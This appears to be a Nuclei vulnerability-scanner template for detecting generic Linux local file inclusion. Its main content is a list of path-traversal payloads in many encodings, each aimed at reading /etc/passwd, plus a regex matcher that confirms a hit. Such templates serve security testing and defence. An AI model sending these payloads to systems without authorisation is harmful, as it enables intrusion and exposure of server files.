nuclei-templates/http/vulnerabilities/generic/generic-linux-lfi.yaml

id: generic-linux-lfi

info:
  name: Generic Linux - Local File Inclusion
  author: geeknik,unstabl3,pentest_swissky,sushantkamble,0xSmiley,DhiyaneshDK
  severity: high
  description: Generic Linux is subject to Local File Inclusion - the vulnerability was identified by requesting /etc/passwd from the server.
  reference: https://github.com/imhunterand/ApachSAL/blob/main/assets/exploits.json
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 32
  tags: linux,lfi,generic

http:
  - method: GET
    path:
      - "{{BaseURL}}{{paths}}"
    payloads:
      paths:
        - "/etc/passwd"
        - "/..%5cetc/passwd"
        - "/..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5cetc/passwd"
        - "/static/..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/static/..%5c..%5c..%5c..%5c..%5c..%5c..%5cetc/passwd"
        - "/./../../../../../../../../../../etc/passwd"
        - "/%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2e%2eetc/passwd"
        - "/%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cetc/passwd"
        - "/.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./etc/passwd"
        - "/..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cetc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/etc/passwd"
        - "/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd"
        - "/..///////..////..//////etc/passwd"
        - "/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
        - "/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00"
        - "/index.php?page=etc/passwd"
        - "/index.php?page=etc/passwd%00"
        - "/index.php?page=../../etc/passwd"
        - "/index.php?page=....//....//etc/passwd"
        - "/../../../../../../../../../etc/passwd"

    stop-at-first-match: true
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"
        part: body
# digest: 4a0a004730450221008fa5b208c40a4d6559380ab46080a222143ade46780db976102c8ff133cb965902202736679db95d3744e75d6c62710145d203a018f61fedc5b2f7937c5e5e019f0d:922c64590222798bb761d5b6d8e72950